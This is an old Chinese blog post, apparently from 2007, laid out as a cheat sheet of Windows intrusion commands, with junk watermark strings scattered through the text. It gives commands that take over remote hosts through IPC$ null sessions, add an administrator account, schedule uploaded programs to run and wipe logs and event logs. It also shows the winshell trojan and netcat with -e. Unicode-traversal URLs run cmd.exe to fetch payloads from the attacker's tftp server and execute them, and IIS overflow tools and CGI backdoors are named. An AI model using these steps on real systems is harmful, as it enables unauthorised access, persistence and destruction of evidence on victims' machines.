成长中的软件销售,积累与分享 学者的头脑, 艺术家的心, 技术者的手, 劳动者的腿.

网管和黑客都必须知道的命令

上一篇 / 下一篇  2007-12-25 00:53:00

友商社区1e-m3v\Cf"G,kC%l,v4ER c


`a L9e/d[0
qCa+j~g-sN&j0 友商社区&G` ]J"_+v+?

  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:""友商社区eu OSF-YD
  以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator"友商社区 ]x4hj-dm
  传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$
&f:jN dL0   查看远程主机时间 net time \IP地址友商社区Ji4OXYQ#OV2m
  定时启动某个程序 at \IP地址 02:18 readme.exe友商社区:I-C4J$O#M9AGt/o
  查看共享 net view \IP地址友商社区!T6td6t%\g8sGe
  查看netbios工作组列表 nBTstat -A IP地址
2Vt%VSg _2C0   将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator"友商社区q@[/ITAi
  这两条把自己增加到管理员组: net user 用户名 密码 /add友商社区{l fN$w9_7t[^z
  net locaLGroup Administrators 用户名 /add
b7D"H-_ P9j\0   断开连接 net use \IP地址ipc$ /delete友商社区qn!H([!Q9}S
  扫尾:
"M'S0J E&h0   del C:winntsystem32logfiles*.*
)I(@7cA5rck0   del C:winntssytem32config*.evt友商社区;^GH*i&pL
  del C:winntsystem32dTCLog*.*
tIyY^{0   del C:winntsystem32*.log友商社区)D_?&R"@ tT~
  del C:winntsystem32*.txt友商社区wjlfB m0S7j%Q6k
  del C:winnt*.txt友商社区j c `'?7|]
  del C:winnt*.log友商社区s!n L4wc"P8M
一、netsvc.exe
;L:Z*Vr!d/h i8cfZ o0   下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
&q~;Q*J!K!G2T+Yc0   netsvc /list \IP地址
:[(K:nb G[_4J(z S0   netsvc schedule \IP地址 /query友商社区o@8L$x-K _'yA;y
  netsvc \IP地址 schedule /start友商社区^j}1[1F6sc/t3s9Z T
二、OpenTelnet.exe
:e f }qz dp-d.Y0   远程启动主机的Telnet服务,并绑定端口到7878,例如:
Q.T+yk.}f/p(@0   OpenTelnet \IP地址 用户名 密码 1 7878
y0g!c/a8D7u\IA0   然后就可以telnet到主机的7878端口,进入DOS方式下:友商社区8Y*M/tHD%e0LiZ0e
  telnet IP地址 7878友商社区 \Q)yaBT,K
三、winshell.exe
eDC\jS0   一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
xSZWcb_SNK |0   p Path (查看winshell主程序的路径信息)
)d'~V3VYv iN}0   b reBoot (重新启动机器)
T~:x%b}8b\l%J"w(G*k0   d shutDown (关闭机器)
\9_J5N%tf#s?$[9J0   s Shell (执行后你就会看到可爱的“C:>”)友商社区5^,p\L}A1|
  x eXit (退出本次登录会话,此命令并不终止winshell的运行)
bp:G~B;ne0   CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)友商社区+^!vejoX W
四、3389登陆器,GUI方式登录远程主机的
s9H$t1kYk j~${0 五、elsave.exe
Yxau G8l*F0   事件日志清除工具
n} ?#v%}@Y0   elsave -s \IP地址 -l "application" -C友商社区(n5S0I-IE$\6P h
  elsave -s \IP地址 -l "system" -C
[O1wQ)rW0H)E(KJ"uo0   elsave -s \IP地址 -l "security" -C友商社区6hE,D0h1t4I _T
  执行后成功清除应用程序日志,系统日志,安全日志
/JXM"xQ\0 六、hbulot.exe友商社区ZVH ~R!z_5I{*P~!z
  开启win2kserver和winxp的3389服务友商社区'f+R%Mbn3b
  hbulot (/r)
S7i5g8p]0 七、nc.exe(netcat.exe)友商社区a3c\/X RF,u+V
  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
'uq#?.~&?D.oR0   想要连接到某处: nc (-options) hostname port(s)(ports) ...友商社区4{3|%i{;L7~+Cp
  绑定端口等待连接: nc -l -p port (-options) (hostname) (port)友商社区$bd X k ]`
参数:友商社区*x&Z {]$E
  -e prog 程序重定向,一旦连接,就执行 (危险!)
J'KDZ&V R0   -g gateway source-routing hop point(s), up to 8
:X3BzA-tW0   -G num source-routing pointer: 4, 8, 12, ...
*q~ Fe+I Swmp0   -h 帮助信息友商社区N^0} [8J%Y$m
  -i secs 延时的间隔
(e G(N&N8Qt)?6P/e%C0   -l 监听模式,用于入站连接
s5`:@htG]0   -n 指定数字的IP地址,不能用hostname友商社区3Ak^9bJ4[
  -o file 记录16进制的传输
q$@ gkqe$xx2j!n0   -p port 本地端口号
|)w1J0|;P9U~X0vF0   -r 任意指定本地及远程端口
g8U$P(o'@@,[ O0   -s addr 本地源地址
"]R3L }3} IU Zi*mG0   -u UDP模式友商社区:f3{-`VL(u&X9n
  -v 详细输出——用两个-v可得到更详细的内容
7VU;|1f a ](@ O0   -w secs timeout的时间
/X0S#z].x P:A"\0   -z 将输入输出关掉——用于扫描时友商社区^_ \8P3BhC
八、TFTPD32.EXE
s+uG.ba#Q9O+k0   把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:友商社区 J!zOt2^&nTMD
 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名友商社区f3m8}'m{#k&q)BRFb
  然后可以直接令文件运行:
h _SreaiV9KD0   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
8p@nLy#uc0 九、prihack.exe是IIS的printer远程缓冲区溢出工具友商社区!@!{TAF(K4j
  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。友商社区7T ue,H-w
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
Y(`2DhY F0 友商社区?5V6p V o3]+]


t9mt/U)LB8E"l0友商社区uVVO mU hM,@
友商社区NHb({IY5U Bgjs Bs


TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

日历

« 2008-12-03  
 123456
78910111213
14151617181920
21222324252627
28293031   

数据统计

  • 访问量: 10921
  • 日志数: 257
  • 建立时间: 2008-01-08
  • 更新时间: 2008-10-21

RSS订阅

Open Toolbar